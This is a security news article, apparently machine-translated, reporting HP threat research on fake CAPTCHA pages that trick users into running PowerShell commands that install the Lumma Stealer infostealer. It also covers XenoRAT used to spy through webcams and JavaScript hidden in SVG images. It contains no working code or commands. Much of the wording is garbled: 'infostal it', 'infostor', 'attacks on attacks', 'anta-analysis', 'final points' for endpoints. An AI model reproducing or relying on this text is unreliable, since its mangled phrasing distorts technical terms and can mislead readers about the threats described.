- The HP Threat Insights report reveals new malware campaigns
- The victims have their data exfiltrated by a Trojan horse remotely
- The attackers were observed using false Captcha verification pages
New research has said that the victims have increasingly infected with malicious software thanks to an increase in the false tests for verification of CAPTCHA – taking advantage of a growing tolerance of click ”, because users are increasingly used to “ jump through hoops to authenticate themselves online ”.
This is not the first report to report this attack, security researchers identifying the false Captcha pages repairing malicious software to infostal it at the end of 2024, but the latest report on HP threats now warns that this is increasing.
Users were generally directed to websites controlled by the attacker, then pushed to finish convincing but false authentication challenges.
More identified campaigns
These false Captchas generally encourage users to execute malicious PowerShell commands on their device which install a Trojan with remote access from Lumma Stealer-a popular infostor capable of exfiltrating a wide range of sensitive information, such as browser details, e-mail identification information, customer data and even cryptocurrency wallets.
The false propagation of CAPTCHA was not the only discovery threat, attackers also being able to access the webcams and microphones of end users in attacks on attacks via social engineering attacks, mainly using the open source rat and xenorat to control the devices, exfiltrate data and log keys.
At the same time, the attackers were observed delivering a malicious javascript code “inside Scalable Vector Graphic (SVG) images to escape detection”. These images are open “default” in browsers, and the integrated code is executed, “offering redundancy and monetization opportunities for the attacker” thanks to remote access tools.
“A common thread through these campaigns is the use of obscure and anta-analysis techniques to slow down surveys,” said Patrick Schläpfer, principal researcher in the HP security laboratory.
“Even simple but effective defense escape techniques can delay the detection and response of safety operations teams, which makes it more difficult to contain it with an intrusion. Using methods such as direct system calls, attackers make it more difficult for safety tools to catch a malicious activity, giving them more time to work without being detected – and compromise the final points of the victims.”
